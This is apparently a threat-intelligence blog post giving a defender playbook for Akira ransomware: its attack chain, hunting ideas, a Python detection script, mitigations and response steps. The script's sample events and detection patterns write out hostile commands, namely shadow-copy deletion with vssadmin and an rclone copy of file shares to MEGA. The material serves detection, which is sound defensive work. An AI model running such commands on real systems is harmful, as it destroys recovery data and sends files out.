Akira Ransomware — Threat Analysis & Defender Playbook
Prepared by CyberDudeBivash Threat Intelligence

Executive summary

Akira is a prolific RaaS operation active since March 2023, impacting organizations across North America, Europe, and Australia. By Jan 1, 2024 it had hit 250+ organizations and amassed ≈$42M. Akira runs dual codebases: classic C++ (adds “.akira”) and a Rust line (“Megazord / Akira v2”) that can add “.powerranges” and targets VMware ESXi/Linux as well as Windows. CISA

In 2025, activity continues with reports of MSP-focused campaigns and suspected VPN appliance abuse (e.g., SonicWall incidents under investigation). Treat edge/VPN as the highest-risk surface. IT Pro, TechRadar


Attack chain (MITRE-mapped highlights)

Initial access — TA0001

  • VPNs without MFA; frequent focus on Cisco ASA/FTD via CVE-2023-20269 (unauthenticated brute-force against the clientless SSL VPN) and CVE-2020-3259 (memory disclosure that can leak usernames and passwords from the device). Also RDP, spear-phishing, and valid credentials. Kroll, Truesec, Cisco Blogs, CISA

Discovery / Privilege escalation — TA0007/TA0004

  • Create new domain accounts (observed name: itadm), Kerberoasting, LSASS credential dumping (Mimikatz/LaZagne), network scanning with SoftPerfect/Advanced IP Scanner. CISA

C2 / Staging — TA0011

  • Remote admin/tunneling tools: AnyDesk, RustDesk, MobaXterm, Ngrok, Cloudflare Tunnel. CISA

Exfiltration — TA0010

  • WinSCP, Rclone, FileZilla, archives with WinRAR, egress to MEGA/cloud buckets before encryption (double extortion). CISA

Impact — TA0040

  • Hybrid crypto (ChaCha20 + RSA); ransom note fn.txt; file extensions .akira or .powerranges; Tor portal with unique victim code; initial note often omits a dollar amount. CISA

2024–2025 evolution to watch

  • Rust/ESXi “v2” line appeared in early 2024; research shows ESXi-specific logic and additional extension .akiranew seen in the wild. Check Point Research
  • MSP targeting emphasized in recent threat intel; compromises of a service provider can cascade to downstream clients. IT Pro
  • SonicWall SSL-VPN incidents (mid-2025): investigations ongoing; harden/monitor even fully patched devices. TechRadar

Hunt & detect (quick wins you can deploy today)

Windows/AD

  • Alert on shadow-copy deletion (vssadmin/wmic shadowcopy delete) + mass file rename to Akira extensions + fn.txt drops.
  • Detect new domain admin / account creations (look for odd admin names like itadm).
  • LSASS access + Kerberoast patterns; unsigned PowerShell staging. CISA

VPN/Edge

  • Look for clientless SSL-VPN sessions created without MFA; brute-force/spray to ASA/FTD; anomalous geography. Patch/monitor for CVE-2023-20269/CVE-2020-3259 indicators. Kroll

Exfil

  • Unusual WinSCP/Rclone/FileZilla from servers; egress to MEGA/SFTP; large outbound SSH after hours. CISA

ESXi/Linux

  • Sudden VM power-off waves; new SSH enablement; suspicious SFTP of encryptors to multiple hosts. (Rust/ESXi line). Check Point Research
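The Windows/AD and exfil quick wins above, written out as behaviour-based hunt rules over constructed sample events. This is an added example for this playbook, not code from the CISA advisory, Check Point or the original post. The event field names (ts, kind, host, role, cmdline, path, event_id, target_user, user, service, enc_type) are assumptions standing in for whatever your SIEM normalises from Security/Sysmon and EDR telemetry, and the thresholds are starting points to tune against your baseline.

```python
"""Behaviour-based hunt rules for the Akira TTPs above, run over constructed
sample events (not real telemetry; field names are assumptions of this example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

AKIRA_EXTS = (".akira", ".powerranges", ".akiranew")   # per CISA / Check Point
RANSOM_NOTE = "fn.txt"
EXFIL_TOOLS = ("rclone.exe", "winscp.exe", "filezilla.exe")  # flagged on servers only
SHADOW_DELETE = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"
    r"|win32_shadowcopy.*delete", re.IGNORECASE)
# "itadm" is the name CISA reports; assumption: any new account containing
# "adm" that is not in change control is worth a look.
SUSPICIOUS_ACCOUNT = re.compile(r"adm", re.IGNORECASE)
WINDOW = timedelta(minutes=2)
RENAME_THRESHOLD = 20      # Akira-extension writes on one host within WINDOW
KERBEROAST_THRESHOLD = 5   # distinct RC4 (0x17) TGS requests by one user within WINDOW

def burst(events, key, threshold, window=WINDOW):
    """Keys with at least `threshold` events inside some sliding `window`."""
    buckets = defaultdict(list)
    for e in events:
        buckets[key(e)].append(datetime.fromisoformat(e["ts"]))
    hits = set()
    for k, times in buckets.items():
        times.sort()
        lo = 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                hits.add(k)
                break
    return hits

def hunt(events):
    """Return (rule, host_or_user, detail) findings: behaviour, not hashes."""
    findings, renames, rc4, seen = [], [], [], set()
    for e in events:
        if e["kind"] == "process":
            if SHADOW_DELETE.search(e["cmdline"]):
                findings.append(("shadow_copy_deletion", e["host"], e["cmdline"]))
            # image = first token of the command line (paths without spaces assumed)
            image = e["cmdline"].split()[0].rsplit("\\", 1)[-1].lower()
            if image in EXFIL_TOOLS and e.get("role") == "server":
                findings.append(("exfil_tool_on_server", e["host"], image))
        elif e["kind"] == "file":
            name = e["path"].rsplit("\\", 1)[-1].lower()
            if name == RANSOM_NOTE:
                findings.append(("ransom_note_drop", e["host"], e["path"]))
            elif name.endswith(AKIRA_EXTS):
                renames.append(e)
        elif e["kind"] == "security":           # Windows Security event IDs
            if e["event_id"] == 4720 and SUSPICIOUS_ACCOUNT.search(e["target_user"]):
                findings.append(("suspicious_account_created", e["host"], e["target_user"]))
            elif e["event_id"] == 4769 and e.get("enc_type") == "0x17":
                if (e["user"], e["service"]) not in seen:   # count distinct SPNs only
                    seen.add((e["user"], e["service"]))
                    rc4.append(e)
    for host in burst(renames, lambda e: e["host"], RENAME_THRESHOLD):
        findings.append(("mass_rename_akira_ext", host, f">={RENAME_THRESHOLD} files in {WINDOW}"))
    for user in burst(rc4, lambda e: e["user"], KERBEROAST_THRESHOLD):
        findings.append(("kerberoast_rc4_burst", user, f">={KERBEROAST_THRESHOLD} RC4 TGS requests"))
    return findings

def sample_events():
    """Constructed telemetry: FS01 has shadows deleted, 25 files renamed and fn.txt
    dropped, with rclone run earlier; DC01 sees 'itadm' created and jdoe pulling
    RC4 tickets for six SPNs; WS07 and svc_backup are benign noise."""
    base = datetime(2025, 8, 1, 2, 10, 0)
    t = lambda s: (base + timedelta(seconds=s)).isoformat()
    ev = [{"ts": t(i), "kind": "file", "host": "FS01",
           "path": f"D:\\Shares\\Finance\\report{i}.xlsx.akira"} for i in range(25)]
    ev += [{"ts": t(30), "kind": "file", "host": "FS01", "path": "D:\\Shares\\Finance\\fn.txt"},
           {"ts": t(5), "kind": "process", "host": "FS01", "role": "server",
            "cmdline": "vssadmin.exe delete shadows /all /quiet"},
           {"ts": t(-600), "kind": "process", "host": "FS01", "role": "server",
            "cmdline": "C:\\Tools\\rclone.exe copy D:\\Shares mega:loot"},
           {"ts": t(-3600), "kind": "security", "host": "DC01", "event_id": 4720, "target_user": "itadm"},
           {"ts": t(-2900), "kind": "security", "host": "DC01", "event_id": 4769,
            "user": "svc_backup", "service": "HOST/fs01", "enc_type": "0x12"},
           {"ts": t(40), "kind": "file", "host": "WS07", "path": "C:\\Users\\a\\notes.txt"}]
    for i, spn in enumerate(["MSSQLSvc/sql01", "HTTP/web01", "CIFS/fs01",
                             "ldap/dc01", "exchange/mail01", "MSSQLSvc/sql02"]):
        ev.append({"ts": t(-3000 + 10 * i), "kind": "security", "host": "DC01",
                   "event_id": 4769, "user": "jdoe", "service": spn, "enc_type": "0x17"})
    return ev

if __name__ == "__main__":
    for rule, where, detail in hunt(sample_events()):
        print(f"{rule:27} {where:6} {detail}")
```

Running the file prints six findings, one per rule. Two points when you port this to your SIEM: RC4 (0x17) service-ticket requests are the classic Kerberoast signal but legacy applications request RC4 tickets too, so baseline per account before alerting; and the mass-rename rule keys on the Akira extensions above, which is deliberate for this playbook but should sit beside a generic "many renames by one process in a short window" rule that does not depend on a known extension. The VPN/edge and ESXi hunts follow the same shape over ASA syslog and hostd/shell logs.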

Priority mitigations (that actually reduce risk)

  1. Patch the edge first: Cisco ASA/FTD (CVE-2023-20269, CVE-2020-3259), VPNs, ESXi, RDP gateways. Kroll, Truesec
  2. Phishing-resistant MFA (FIDO) on VPN/RDP; block or tightly allowlist RMM/tunneling tools. Kroll
  3. Harden identity: monitor new admin creation, enforce least privilege, rotate creds after VPN patching (memory disclosure risk). Truesec
  4. Exfil controls: DLP/outbound blocks for MEGA, restrict SFTP/SSH from non-admin segments; alert on Rclone/WinSCP. CISA
  5. Resilience: offline/immutable backups; test restores; practice tabletop IR for double-extortion scenarios. CISA

Indicators & artifacts (use behavior > hashes)

  • Note/extension: fn.txt, “.akira”, “.powerranges” (and occasionally “.akiranew”). CISA, Check Point Research
  • Tools often seen: AnyDesk/RustDesk/Ngrok/Cloudflare Tunnel; WinRAR + WinSCP/Rclone/FileZilla. CISA

Rapid response playbook (print-friendly)

  1. Contain: isolate edge/VPN device, disable clientless SSL-VPN, block suspicious RMM, lock new admin accounts.
  2. Preserve: collect ASA/FTD logs, VPN/RADIUS, AD, EDR, ESXi logs; snapshot affected VMs.
  3. Hunt: search for fn.txt drops and the .akira/.powerranges extensions, VSS deletions, ASA brute-force, Rclone/WinSCP beacons.
  4. Eradicate: patch ASA/FTD/ESXi; rotate creds (assume disclosure if CVE-2020-3259 window existed); remove persistence.
  5. Recover & notify: restore from clean backups; execute breach notifications per sector laws; report to FBI/IC3/CISA. CISA

Sources / recommended reading

  • CISA/FBI/EC3/NCSC-NL #StopRansomware: Akira — TTPs, IOCs, mitigations, statistics. CISA
  • Check Point Research — deep dive on the Rust/ESXi (“v2”) line. Check Point Research
  • Cisco — Akira campaigns against VPNs without MFA. Cisco Blogs
  • Truesec — analysis of CVE-2020-3259 memory-leak abuse by Akira. Truesec
  • Kroll — ASA/FTD focus, toolset during intrusions. Kroll

#CyberDudeBivash #Akira #Ransomware #RaaS #DoubleExtortion #ESXi #VPNSecurity #CISA #MITREATTACK #DFIR #XDR #ThreatIntel #IncidentResponse
